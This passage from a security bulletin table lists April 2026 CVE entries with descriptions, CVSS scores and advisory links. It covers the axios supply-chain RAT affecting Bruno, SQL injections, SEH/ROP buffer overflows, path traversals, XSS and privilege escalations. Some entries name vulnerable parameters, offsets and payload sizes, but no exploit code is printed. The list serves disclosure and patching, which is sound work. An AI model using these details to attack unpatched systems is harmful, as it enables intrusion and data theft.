https://mysites.guru/blog/smart-slider-3-pro-supply-chain-compromise/ |
| usebruno--bruno | Bruno is an open source IDE for exploring and testing APIs. Prior to 3.2.1, Bruno was affected by a supply chain attack involving compromised versions of the axios npm package, which introduced a hidden dependency deploying a cross-platform Remote Access Trojan (RAT). Users of @usebruno/cli who ran npm install between 00:21 UTC and ~03:30 UTC on March 31, 2026 may have been impacted. Upgrade to 3.2.1. | 2026-04-06 | 9.8 | CVE-2026-34841 | https://github.com/usebruno/bruno/security/advisories/GHSA-658g-p7jg-wx5g https://github.com/axios/axios/issues/10604 https://github.com/usebruno/bruno/pull/7632 https://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat |
| R-Project--RGui | RGui 3.5.0 contains a local buffer overflow vulnerability in the GUI preferences dialog that allows attackers to bypass DEP protections through structured exception handling exploitation. Attackers can craft malicious input in the Language for menus and messages field to trigger a stack-based buffer overflow, execute a ROP chain for VirtualAlloc allocation, and achieve arbitrary code execution. | 2026-04-12 | 8.4 | CVE-2018-25258 | ExploitDB-46107 Official Product Homepage Product Reference VulnCheck Advisory: RGui 3.5.0 Local Buffer Overflow SEH DEP Bypass |
| Html5Videoplayer--HTML5 Video Player | HTML5 Video Player 1.2.5 contains a local buffer overflow vulnerability that allows attackers to execute arbitrary code by supplying an oversized key code string. Attackers can craft a malicious payload exceeding 997 bytes and paste it into the KEY CODE field in the Help Register dialog to trigger code execution and spawn a calculator process. | 2026-04-12 | 8.4 | CVE-2019-25689 | ExploitDB-46279 Official Product Homepage VulnCheck Advisory: HTML5 Video Player 1.2.5 Local Buffer Overflow Non-SEH |
| Faleemi--Faleemi Desktop Software | Faleemi Desktop Software 1.8 contains a local buffer overflow vulnerability in the System Setup dialog that allows attackers to bypass DEP protections through structured exception handling exploitation. Attackers can inject a crafted payload into the Save Path for Snapshot and Record file field to trigger a buffer overflow and execute arbitrary code via ROP chain gadgets. | 2026-04-12 | 8.4 | CVE-2019-25691 | ExploitDB-46269 Official Product Homepage VulnCheck Advisory: Faleemi Desktop Software 1.8 Local Buffer Overflow SEH DEP Bypass |
| r-project--R | R 3.4.4 contains a local buffer overflow vulnerability that allows attackers to execute arbitrary code by injecting malicious input into the GUI Preferences language field. Attackers can craft a payload with a 292-byte offset and JMP ESP instruction to execute commands like calc.exe when the payload is pasted into the Language for menus and messages field. | 2026-04-12 | 8.4 | CVE-2019-25695 | ExploitDB-46265 Official Product Homepage VulnCheck Advisory: R 3.4.4 Local Buffer Overflow Windows XP SP3 |
| VictorAlagwu--CMSsite | CMSsite 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the cat_id parameter. Attackers can send GET requests to category.php with malicious cat_id values to extract sensitive database information including usernames and credentials. | 2026-04-12 | 8.2 | CVE-2019-25697 | ExploitDB-46259 Product Reference VulnCheck Advisory: CMSsite 1.0 SQL Injection via category.php |
| Divxtodvd--Easy Video to iPod Converter | Easy Video to iPod Converter 1.6.20 contains a local buffer overflow vulnerability in the user registration field that allows local attackers to overwrite the structured exception handler. Attackers can input a crafted payload exceeding 996 bytes in the username field to trigger SEH overwrite and execute arbitrary code with user privileges. | 2026-04-12 | 8.4 | CVE-2019-25701 | ExploitDB-46255 Official Product Homepage Product Reference VulnCheck Advisory: Easy Video to iPod Converter 1.6.20 Local Buffer Overflow SEH |
| Sourceforge--Echo Mirage | Echo Mirage 3.1 contains a stack buffer overflow vulnerability that allows local attackers to crash the application or execute arbitrary code by supplying an oversized string in the Rules action field. Attackers can create a malicious text file with a crafted payload exceeding buffer boundaries and paste it into the action field through the Rules dialog to trigger the overflow and overwrite the return address. | 2026-04-12 | 8.4 | CVE-2019-25705 | ExploitDB-46216 Official Product Homepage Product Reference VulnCheck Advisory: Echo Mirage 3.1 Stack Buffer Overflow via Rules Action Field |
| Dolibarr--Dolibarr ERP-CRM | Dolibarr ERP-CRM 8.0.4 contains an SQL injection vulnerability in the rowid parameter of the admin dict.php endpoint that allows attackers to execute arbitrary SQL queries. Attackers can inject malicious SQL code through the rowid POST parameter to extract sensitive database information using error-based SQL injection techniques. | 2026-04-12 | 8.2 | CVE-2019-25710 | ExploitDB-46095 Official Product Homepage Product Reference VulnCheck Advisory: Dolibarr ERP-CRM 8.0.4 SQL Injection via rowid Parameter |
| Synology--Synology SSL VPN Client | A plaintext storage of a password vulnerability in Synology SSL VPN Client before 1.4.5-0684 allows remote attackers to access or influence the user's PIN code due to insecure storage. This may lead to unauthorized VPN configuration and potential interception of subsequent VPN traffic when combined with user interaction. | 2026-04-10 | 8.1 | CVE-2021-47961 | Synology-SA-26:05 Synology SSL VPN Client |
| Adivaha--WordPress adivaha Travel Plugin | WordPress adivaha Travel Plugin 2.3 contains a time-based blind SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'pid' GET parameter. Attackers can send requests to the /mobile-app/v3/ endpoint with crafted 'pid' values using XOR-based payloads to extract sensitive database information or cause denial of service. | 2026-04-09 | 8.2 | CVE-2023-54359 | ExploitDB-51655 Official Product Homepage Product Reference VulnCheck Advisory: WordPress adivaha Travel Plugin 2.3 SQL Injection via pid |
| Juniper Networks--Apstra | A Key Exchange without Entity Authentication vulnerability in the SSH implementation of Juniper Networks Apstra allows an unauthenticated, MITM attacker to impersonate managed devices. Due to insufficient SSH host key validation an attacker can perform a machine-in-the-middle attack on the SSH connections from Apstra to managed devices, enabling an attacker to impersonate a managed device and capture user credentials. This issue affects all versions of Apstra before 6.1.1. | 2026-04-09 | 8.7 | CVE-2025-13914 | https://kb.juniper.net/JSA107862 |
| Qualcomm, Inc.--Snapdragon | Memory corruption when decoding corrupted satellite data files with invalid signature offsets. | 2026-04-06 | 8.8 | CVE-2025-47392 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| CactusThemes--VideoPro | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in CactusThemes VideoPro allows PHP Local File Inclusion. This issue affects VideoPro: from n/a through 2.3.8.1. | 2026-04-10 | 8.1 | CVE-2025-58913 | https://patchstack.com/database/wordpress/theme/videopro/vulnerability/wordpress-videopro-theme-2-3-8-1-local-file-inclusion-vulnerability?_s_id=cve |
| Hitachi--JP1/IT Desktop Management 2 - Manager | Remote Code Execution Vulnerability in JP1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management 2 - Operations Director on Windows, Job Management Partner 1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management - Manager on Windows, Job Management Partner 1/IT Desktop Management - Manager on Windows, JP1/NETM/DM Manager on Windows, JP1/NETM/DM Client on Windows, Job Management Partner 1/Software Distribution Manager on Windows, Job Management Partner 1/Software Distribution Client on Windows.This issue affects JP1/IT Desktop Management 2 - Manager: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; JP1/IT Desktop Management 2 - Operations Director: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; Job Management Partner 1/IT Desktop Management 2 - Manager: from 10-50 through 10-50-11; JP1/IT Desktop Management - Manager: from 09-50 through 10-10-16; Job Management Partner 1/IT Desktop Management - Manager: from 09-50 through 10-10-16; JP1/NETM/DM Manager: from 09-00 through 10-20-02; JP1/NETM/DM Client: from 09-00 through 10-20-02; Job Management Partner 1/Software Distribution Manager: from 09-00 through 09-51-13; Job Management Partner 1/Software Distribution Client: from 09-00 through 09-51-13. | 2026-04-07 | 8.8 | CVE-2025-65115 | https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2026-118/index.html |
| IBM--Verify Identity Access Container | IBM Verify Identity Access Container 11.0 through 11.0.2 and IBM Security Verify Access Container 10.0 through 10.0.9.1 and IBM Verify Identity Access 11.0 through 11.0.2 and IBM Security Verify Access 10.0 through 10.0.9.1 could allow a locally authenticated user to execute malicious scripts from outside of its control sphere. | 2026-04-07 | 8.5 | CVE-2026-1342 | https://www.ibm.com/support/pages/node/7268253 |
| LibRaw--LibRaw | An integer overflow vulnerability exists in the deflate_dng_load_raw functionality of LibRaw Commit 8dc68e2. A specially crafted malicious file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability. | 2026-04-07 | 8.1 | CVE-2026-20884 | https://talosintelligence.com/vulnerability_reports/TALOS-2026-2364 |
| Windmill Labs--Windmill CE (Community Edition) | Windmill versions 1.56.0 through 1.614.0 contain a missing authorization vulnerability that allows users with the Operator role to perform prohibited entity creation and modification actions via the backend API. Although Operators are documented and priced as unable to create or modify entities, the API does not enforce the Operator restriction on workspace endpoints, allowing an Operator to create and update scripts, flows, apps, and raw_apps. Since Operators can also execute scripts via the jobs API, this allows direct privilege escalation to remote code execution within the Windmill deployment. This vulnerability has existed since the introduction of the Operator role in version 1.56.0. | 2026-04-07 | 8.8 | CVE-2026-22683 | https://chocapikk.com/posts/2026/windfall-nextcloud-flow-windmill-rce/ https://github.com/Chocapikk/Windfall https://github.com/windmill-labs/windmill/releases/tag/v1.615.0 https://github.com/windmill-labs/windmill/commit/c621a74804f4f6e8318819c01e3a23a17698588b https://www.windmill.dev/ https://apps.nextcloud.com/apps/flow/releases |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38, there is a path traversal in main/exercise/savescores.php leading to arbitrary file deletion. User input from $_REQUEST['test'] is concatenated directly into a filesystem path without canonicalization or traversal checks. This vulnerability is fixed in 1.11.38. | 2026-04-10 | 8.3 | CVE-2026-31939 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-8q8c-v75x-q2hx https://github.com/chamilo/chamilo-lms/commit/4dddcc19d36119da27b7c49eb84a035800abae78 https://github.com/chamilo/chamilo-lms/releases/tag/v1.11.38 |
| danbilabs--Advanced Members for ACF | The Advanced Members for ACF plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the create_crop function in all versions up to, and including, 1.2.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). The vulnerability was partially patched in version 1.2.5. | 2026-04-08 | 8.8 | CVE-2026-3243 | https://www.wordfence.com/threat-intel/vulnerabilities/id/22b63369-c6ea-42e9-bea3-d15837da7732?source=cve https://plugins.trac.wordpress.org/browser/advanced-members/tags/1.2.4/core/modules/class-avatar.php#L57 https://plugins.trac.wordpress.org/browser/advanced-members/tags/1.2.4/core/modules/class-avatar.php#L266 https://plugins.trac.wordpress.org/browser/advanced-members/trunk/core/modules/class-avatar.php#L710 https://plugins.trac.wordpress.org/changeset/3479725/ https://plugins.trac.wordpress.org/changeset/3492372/ |
| Elastic--Logstash | Improper Limitation of a Pathname to a Restricted Directory (CWE-22) in Logstash can lead to arbitrary file write and potentially remote code execution via Relative Path Traversal (CAPEC-139). The archive extraction utilities used by Logstash do not properly validate file paths within compressed archives. An attacker who can serve a specially crafted archive to Logstash through a compromised or attacker-controlled update endpoint can write arbitrary files to the host filesystem with the privileges of the Logstash process. In certain configurations where automatic pipeline reloading is enabled, this can be escalated to remote code execution. | 2026-04-08 | 8.1 | CVE-2026-33466 | https://discuss.elastic.co/t/logstash-8-19-14-9-2-8-9-3-3-security-update-esa-2026-29/385816 |
| homarr-labs--homarr | Homarr is an open-source dashboard. Prior to 1.57.0, a DOM-based Cross-Site Scripting (XSS) vulnerability has been discovered in Homarr's /auth/login page. The application improperly trusts a URL parameter (callbackUrl), which is passed to redirect and router.push. An attacker can craft a malicious link that, when opened by an authenticated user, performs a client-side redirect and executes arbitrary JavaScript in the context of their browser. This could lead to credential theft, internal network pivoting, and unauthorized actions performed on behalf of the victim. This vulnerability is fixed in 1.57.0. | 2026-04-06 | 8.8 | CVE-2026-33510 | https://github.com/homarr-labs/homarr/security/advisories/GHSA-79pg-554g-rw82 |
| IBM--Langflow Desktop | IBM Langflow Desktop 1.6.0 through 1.8.2 could allow an authenticated user to execute arbitrary code on the system, caused by an insecure default setting which permits the deserialization of untrusted data in the FAISS component. | 2026-04-08 | 8.8 | CVE-2026-3357 | https://www.ibm.com/support/pages/node/7268428 |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, the PlatformConfigurationController::decodeSettingArray() method uses PHP's eval() to parse platform settings from the database. An attacker with admin access (obtainable via Advisory 1) can inject arbitrary PHP code into the settings, which is then executed when any user (including unauthenticated) requests /platform-config/list. This vulnerability is fixed in 2.0.0-RC.3. | 2026-04-10 | 8.8 | CVE-2026-33618 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-hp4w-jmwc-pg7w https://github.com/chamilo/chamilo-lms/commit/f2c382c94a3f153a4d7e5ce5686c5a219fd09b3b |
| lexiforest--curl_cffi | curl_cffi is a Python binding for curl. Prior to 0.15.0, curl_cffi does not restrict requests to internal IP ranges, and follows redirects automatically via the underlying libcurl. Because of this, an attacker-controlled URL can redirect requests to internal services such as cloud metadata endpoints. In addition, curl_cffi's TLS impersonation feature can make these requests appear as legitimate browser traffic, which may bypass certain network controls. This vulnerability is fixed in 0.15.0. | 2026-04-06 | 8.6 | CVE-2026-33752 | https://github.com/lexiforest/curl_cffi/security/advisories/GHSA-qw2m-4pqf-rmpp |
| Juniper Networks--Junos OS | A Missing Authorization vulnerability in the CLI of Juniper Networks Junos OS on MX Series allows a local, authenticated user with low privileges to execute specific commands which will lead to a complete compromise of managed devices. Any user logged in, without requiring specific privileges, can issue 'request csds' CLI operational commands. These commands are only meant to be executed by high privileged or users designated for Juniper Device Manager (JDM) / Connected Security Distributed Services (CSDS) operations as they will impact all aspects of the devices managed via the respective MX. This issue affects Junos OS on MX Series: * 24.4 releases before 24.4R2-S3, * 25.2 releases before 25.2R2. This issue does not affect Junos OS releases before 24.4. | 2026-04-09 | 8.8 | CVE-2026-33785 | https://kb.juniper.net/JSA107872 |
| podman-desktop--podman-desktop | Podman Desktop is a graphical tool for developing on containers and Kubernetes. Prior to 1.26.2, an unauthenticated HTTP server exposed by Podman Desktop allows any network attacker to remotely trigger denial-of-service conditions and extract sensitive information. By abusing missing connection limits and timeouts, an attacker can exhaust file descriptors and kernel memory, leading to application crash or full host freeze. Additionally, verbose error responses disclose internal paths and system details (including usernames on Windows), aiding further exploitation. The issue requires no authentication or user interaction and is exploitable over the network. This vulnerability is fixed in 1.26.2. | 2026-04-07 | 8.2 | CVE-2026-34045 | https://github.com/podman-desktop/podman-desktop/security/advisories/GHSA-2q88-39rh-gxvv |
| OpenClaw--OpenClaw | OpenClaw before 2026.3.25 contains an improper access control vulnerability in the HTTP /sessions/:sessionKey/kill route that allows any bearer-authenticated user to invoke admin-level session termination functions without proper scope validation. Attackers can exploit this by sending authenticated requests to kill arbitrary subagent sessions via the killSubagentRunAdmin function, bypassing ownership and operator scope restrictions. | 2026-04-09 | 8.1 | CVE-2026-34512 | GitHub Security Advisory (GHSA-9p93-7j67-5pc2) Patch Commit VulnCheck Advisory: OpenClaw < 2026.3.25 - Improper Access Control in /sessions/:sessionKey/kill Endpoint |
| opnsense--core | OPNsense is a FreeBSD based firewall and routing platform. Prior to 26.1.6, OPNsense's LDAP authentication connector passes the login username directly into an LDAP search filter without calling ldap_escape(). An unauthenticated attacker can inject LDAP filter metacharacters into the username field of the WebGUI login page to enumerate valid LDAP usernames in the configured directory. When the LDAP server configuration includes an Extended Query to restrict login to members of a specific group, the same injection can be used to bypass that group membership restriction and authenticate as any LDAP user whose password is known, regardless of group membership. This vulnerability is fixed in 26.1.6. | 2026-04-09 | 8.2 | CVE-2026-34578 | https://github.com/opnsense/core/security/advisories/GHSA-jpm7-f59c-mp54 https://github.com/opnsense/core/commit/016f66cb4620cd48183fa97843f343bb71813c6e |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30356, 26.001.21367 and earlier are affected by an Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-04-11 | 8.6 | CVE-2026-34621 | https://helpx.adobe.com/security/products/acrobat/apsb26-43.html |
| MontFerret--ferret | Ferret is a declarative system for working with web data. Prior to 2.0.0-alpha.4, a path traversal vulnerability in Ferret's IO::FS::WRITE standard library function allows a malicious website to write arbitrary files to the filesystem of the machine running Ferret. When an operator scrapes a website that returns filenames containing ../ sequences, and uses those filenames to construct output paths (a standard scraping pattern), the attacker controls both the destination path and the file content. This can lead to remote code execution via cron jobs, SSH authorized_keys, shell profiles, or web shells. This vulnerability is fixed in 2.0.0-alpha.4. | 2026-04-06 | 8.1 | CVE-2026-34783 | https://github.com/MontFerret/ferret/security/advisories/GHSA-j6v5-g24h-vg4j https://github.com/MontFerret/ferret/commit/160ebad6bd50f153453e120f6d909f5b83322917 |
| David Lingren--Media LIbrary Assistant | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in David Lingren Media LIbrary Assistant allows SQL Injection. This issue affects Media LIbrary Assistant: from n/a through 3.34. | 2026-04-06 | 8.5 | CVE-2026-34885 | https://patchstack.com/database/wordpress/plugin/media-library-assistant/vulnerability/wordpress-media-library-assistant-plugin-3-34-sql-injection-vulnerability?_s_id=cve |
| adianti--Adianti Framework | Adianti Framework 5.5.0 and 5.6.0 contains an SQL injection vulnerability that allows authenticated users to manipulate database queries by injecting SQL code through the name field in SystemProfileForm. Attackers can submit crafted SQL statements in the profile edit endpoint to modify user credentials and gain administrative access. | 2026-04-12 | 7.1 | CVE-2018-25257 | ExploitDB-46217 VulnCheck Advisory: Adianti Framework 5.5.0 and 5.6.0 SQL Injection via Profile |
| Resourcespace--ResourceSpace | ResourceSpace 8.6 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the keywords parameter in collection_edit.php. Attackers can submit POST requests with crafted SQL payloads in the keywords field to extract sensitive database information including schema names, user credentials, and other confidential data. | 2026-04-12 | 7.1 | CVE-2019-25693 | ExploitDB-46274 Official Product Homepage Product Reference VulnCheck Advisory: ResourceSpace 8.6 SQL Injection via collection_edit.php |
| Newsbull--Newsbull Haber Script | Newsbull Haber Script 1.0.0 contains multiple SQL injection vulnerabilities in the search parameter that allow authenticated attackers to extract database information through time-based, blind, and boolean-based injection techniques. Attackers can inject malicious SQL code through the search parameter in endpoints like /admin/comment/records, /admin/category/records, /admin/news/records, and /admin/menu/childs to manipulate database queries and retrieve sensitive data. | 2026-04-12 | 7.1 | CVE-2019-25699 | ExploitDB-46266 Official Product Homepage Product Reference VulnCheck Advisory: Newsbull Haber Script 1.0.0 Authenticated SQL Injection via search parameter |
| Impresscms--ImpressCMS | ImpressCMS 1.3.11 contains a time-based blind SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the 'bid' parameter. Attackers can send POST requests to the admin.php endpoint with malicious 'bid' values containing SQL commands to extract sensitive database information. | 2026-04-12 | 7.1 | CVE-2019-25703 | ExploitDB-46239 Official Product Homepage Product Reference VulnCheck Advisory: ImpressCMS 1.3.11 SQL Injection via bid Parameter |
| Across--DR-810 | Across DR-810 contains an unauthenticated file disclosure vulnerability that allows remote attackers to download the rom-0 backup file containing sensitive information by sending a simple GET request. Attackers can access the rom-0 endpoint without authentication to retrieve and decompress the backup file, exposing router passwords and other sensitive configuration data. | 2026-04-12 | 7.5 | CVE-2019-25706 | ExploitDB-46132 Official Product Homepage VulnCheck Advisory: Across DR-810 ROM-0 Unauthenticated File Disclosure |
| Ebrigade--eBrigade ERP | eBrigade ERP 4.5 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the 'id' parameter. Attackers can send GET requests to pdf.php with crafted SQL payloads in the 'id' parameter to extract sensitive database information including table names and schema details. | 2026-04-12 | 7.1 | CVE-2019-25707 | ExploitDB-46117 Official Product Homepage Product Reference VulnCheck Advisory: eBrigade ERP 4.5 SQL Injection via pdf.php |
| MyT--Project Management | MyT-PM 1.5.1 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the Charge[group_total] parameter. Attackers can submit crafted POST requests to the /charge/admin endpoint with error-based, time-based blind, or stacked query payloads to extract sensitive database information or manipulate data. | 2026-04-12 | 7.1 | CVE-2019-25713 | ExploitDB-46084 Official Product Homepage Product Reference VulnCheck Advisory: MyT-PM 1.5.1 SQL Injection via Charge[group_total] Parameter |
| Twitch--Twitch Studio | Twitch Studio version 0.114.8 and prior contain a privilege escalation vulnerability in its privileged helper tool that allows local attackers to execute arbitrary code as root by exploiting an unprotected XPC service. Attackers can invoke the installFromPath:toPath:withReply: method to overwrite system files and privileged binaries, achieving full system compromise. Twitch Studio was discontinued in May 2024. | 2026-04-06 | 7.8 | CVE-2024-14032 | https://www.iru.com/blog/twitch-privileged-helper https://help.twitch.tv/s/topic/0TO3a000000kZfYGAU/twitch-studio https://help.twitch.tv/s/article/recommended-software-for-broadcasting https://www.vulncheck.com/advisories/twitch-studio-launcherhelper-xpc-missing-authorization-to-root-file-write |
| WAGO--CC100 (0751-9x01) | An authenticated remote attacker with high privileges can exploit the OpenVPN configuration via the web-based management interface of a WAGO PLC. If user-defined scripts are permitted, OpenVPN may allow the execution of arbitrary shell commands enabling the attacker to run arbitrary commands on the device. | 2026-04-09 | 7.2 | CVE-2024-1490 | https://certvde.com/de/advisories/VDE-2024-008 https://wago.csaf-tp.certvde.com/.well-known/csaf/white/2026/vde-2024-008.json |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.0 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an unauthenticated user to cause denial of service by sending repeated GraphQL queries. | 2026-04-08 | 7.5 | CVE-2025-12664 | HackerOne Bug Bounty Report #3377091 https://gitlab.com/gitlab-org/gitlab/-/work_items/579376 https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/ |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in libssh. On Windows systems the library, by insecure default, automatically loads configuration files from the C:\etc directory, which can be created and modified by unprivileged local users. This allows local man-in-the-middle attacks, security downgrades of SSH (Secure Shell) connections, and manipulation of trusted host information, posing a significant risk to the confidentiality, integrity, and availability of SSH communications. | 2026-04-07 | 7.8 | CVE-2025-14821 | https://access.redhat.com/security/cve/CVE-2025-14821 RHBZ#2423148 https://www.libssh.org/2026/02/10/libssh-0-12-0-and-0-11-4-security-releases/ |
| Qualcomm, Inc.--Snapdragon | Memory corruption when buffer copy operation fails due to integer overflow during attestation report generation. | 2026-04-06 | 7.8 | CVE-2025-47389 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while preprocessing IOCTL request in JPEG driver. | 2026-04-06 | 7.8 | CVE-2025-47390 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while processing a frame request from user. | 2026-04-06 | 7.8 | CVE-2025-47391 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Cryptographic issue while copying data to a destination buffer without validating its size. | 2026-04-06 | 7.1 | CVE-2025-47400 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Case Themes--Case Theme User | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Case Themes Case Theme User allows PHP Local File Inclusion. This issue affects Case Theme User: from n/a before 1.0.4. | 2026-04-10 | 7.5 | CVE-2025-5804 | https://patchstack.com/database/wordpress/plugin/case-theme-user/vulnerability/wordpress-case-theme-user-1-0-4-local-file-inclusion-vulnerability?_s_id=cve |
| Zootemplate--Cerato | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Zootemplate Cerato allows Reflected XSS. This issue affects Cerato: from n/a through 2.2.18. | 2026-04-10 | 7.1 | CVE-2025-58920 | https://patchstack.com/database/wordpress/theme/cerato/vulnerability/wordpress-cerato-theme-2-2-18-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 12.10 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an unauthenticated user to cause denial of service due to improper input validation of JSON payloads. | 2026-04-08 | 7.5 | CVE-2026-1092 | HackerOne Bug Bounty Report #3487030 https://gitlab.com/gitlab-org/gitlab/-/work_items/586479 https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/ |
| IBM--Verify Identity Access Container | IBM Verify Identity Access Container 11.0 through 11.0.2 and IBM Security Verify Access Container 10.0 through 10.0.9.1 and IBM Verify Identity Access 11.0 through 11.0.2 and IBM Security Verify Access 10.0 through 10.0.9.1 allows an attacker to contact internal authentication endpoints which are protected by the Reverse Proxy. | 2026-04-08 | 7.2 | CVE-2026-1343 | https://www.ibm.com/support/pages/node/7268253 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in gnutls. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted ClientHello message with an invalid Pre-Shared Key (PSK) binder value during the TLS handshake. This can lead to a NULL pointer dereference, causing the server to crash and resulting in a remote Denial of Service (DoS) condition. | 2026-04-09 | 7.5 | CVE-2026-1584 | https://access.redhat.com/security/cve/CVE-2026-1584 RHBZ#2435258 |
| Qualcomm, Inc.--Snapdragon | Transient DOS when processing nonstandard FILS Discovery Frames with out-of-range action sizes during initial scans. | 2026-04-06 | 7.6 | CVE-2026-21367 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when retrieving output buffer with insufficient size validation. | 2026-04-06 | 7.8 | CVE-2026-21371 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when sending IOCTL requests with invalid buffer sizes during memcpy operations. | 2026-04-06 | 7.8 | CVE-2026-21372 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when accessing an output buffer without validating its size during IOCTL processing. | 2026-04-06 | 7.8 | CVE-2026-21373 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when processing auxiliary sensor input/output control commands with insufficient buffer size validation. | 2026-04-06 | 7.8 | CVE-2026-21374 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when accessing an output buffer without validating its size during IOCTL processing. | 2026-04-06 | 7.8 | CVE-2026-21375 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when accessing an output buffer without validating its size during IOCTL processing in a camera sensor driver. | 2026-04-06 | 7.8 | CVE-2026-21376 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when accessing an output buffer without validating its size during IOCTL processing in a camera sensor driver. | 2026-04-06 | 7.8 | CVE-2026-21378 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when using deprecated DMABUF IOCTL calls to manage video memory. | 2026-04-06 | 7.8 | CVE-2026-21380 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Transient DOS when receiving a service data frame with excessive length during device matching over a neighborhood awareness network protocol connection. | 2026-04-06 | 7.6 | CVE-2026-21381 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when handling power management requests with improperly sized input/output buffers. | 2026-04-06 | 7.8 | CVE-2026-21382 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Juniper Networks--Junos OS | A UNIX Symbolic Link (Symlink) Following vulnerability in the CLI of Juniper Networks Junos OS allows a local, authenticated attacker with low privileges to escalate their privileges to root, which will lead to a complete compromise of the system. When, after a user has performed a specific 'file link ...' CLI operation, another user commits (unrelated) configuration changes, the first user can log in as root. This issue affects Junos OS: * all versions before 23.2R2-S7, * 23.4 versions before 23.4R2-S6, * 24.2 versions before 24.2R2-S3, * 24.4 versions before 24.4R2-S2, * 25.2 versions before 25.2R2. This issue does not affect versions 25.4R1 or later. | 2026-04-09 | 7.3 | CVE-2026-21916 | https://kb.juniper.net/JSA107807 |
| Dolibarr--Dolibarr ERP/CRM | Dolibarr ERP/CRM versions prior to 23.0.2 contain an authenticated remote code execution vulnerability in the dol_eval_standard() function that fails to apply forbidden string checks in whitelist mode and does not detect PHP dynamic callable syntax. Attackers with administrator privileges can inject malicious payloads through computed extrafields or other evaluation paths using PHP dynamic callable syntax to bypass validation and achieve arbitrary command execution via eval(). | 2026-04-07 | 7.2 | CVE-2026-22666 | https://jivasecurity.com/writeups/dolibarr-remote-code-execution-cve-2026-22666 https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-vmvw-qq8w-wqhg https://github.com/Dolibarr/dolibarr/commit/6f425521b3e6f9f27eca05228e02093dbaa40dea https://github.com/Dolibarr/dolibarr/releases/tag/23.0.2 https://www.vulncheck.com/advisories/dolibarr-erp-crm-authenticated-rce-via-dol-eval-standard |
